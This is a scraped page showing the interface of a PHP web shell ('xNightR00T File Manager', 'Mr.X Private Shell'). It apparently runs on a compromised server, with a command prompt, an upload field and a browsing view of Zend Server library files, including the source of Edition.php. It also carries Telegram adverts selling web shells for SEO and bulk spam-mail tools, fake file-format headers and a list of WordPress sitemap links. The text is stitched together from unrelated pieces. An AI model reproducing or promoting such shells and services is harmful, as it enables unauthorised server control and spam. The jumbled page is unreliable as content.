xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace ZendServer;

use ZendServer\Ini\IniReader,
    Application\Module as appModule;

class Edition
{

    /**
     * @return boolean
     */
    public function isClusterManager()
    {
        return appModule::config('package', 'edition') == 'cm';
    }

    /**
     * @return boolean
     */
    public function isSingleServer()
    {
        if (isAzureEnv() || isZrayStandaloneEnv()) {
            return true;
        }

        $globalDirectives = $this->getUIGlobalDirectives();
        // in the single zend server edition the zend.node_id=0
        return ( appModule::config('package', 'edition') == 'zs' &&
            isset($globalDirectives['zend.node_id']) &&
            !$globalDirectives['zend.node_id']);
    }

    /**
     * @return boolean
     */
    public function isClusterServer()
    {
        if (isAzureEnv() || isZrayStandaloneEnv()) {
            return false;
        }

        $globalDirectives = $this->getUIGlobalDirectives();
        return ( appModule::config('package', 'zend_gui', 'edition') == 'zs' &&
            isset($globalDirectives['zend.node_id']) &&
            $globalDirectives['zend.node_id']);
    }

    /**
     * @return boolean
     */
    public function isCluster()
    {
        return $this->isClusterServer() || $this->isClusterManager();
    }

    /**
     * @return integer
     */
    public function getServerId()
    {
        $globalDirectives = $this->getUIGlobalDirectives();
        if (isset($globalDirectives['zend.node_id'])) {
            return intval($globalDirectives['zend.node_id']);
        }

        return 0;
    }

    /**
     * @return array
     */
    private function getUIGlobalDirectives()
    {
        $config               = new IniReader();
        $globalDirectivesFile = \ZendServer\FS\FS::getGlobalDirectivesFile();
        $globalDirectives     = $config->fromFile($globalDirectivesFile, false); // flat reading, important for windows
        return $globalDirectives;
    }
}

Filemanager

Name Type Size Permission Actions
Authentication Folder 0755
Configuration Folder 0755
Container Folder 0755
Db Folder 0755
FS Folder 0755
Filter Folder 0755
Form Folder 0755
Http Folder 0755
Ini Folder 0755
Log Folder 0755
Mvc Folder 0755
Navigation Folder 0755
PHPUnit Folder 0755
Permissions Folder 0755
Translator Folder 0755
Utils Folder 0755
Validator Folder 0755
View Folder 0755
Collection.php File 2 KB 0644
Edition.php File 1.95 KB 0644
EditionAwareInterface.php File 155 B 0644
Exception.php File 392 B 0644
Set.php File 2.87 KB 0644
Text.php File 1.64 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml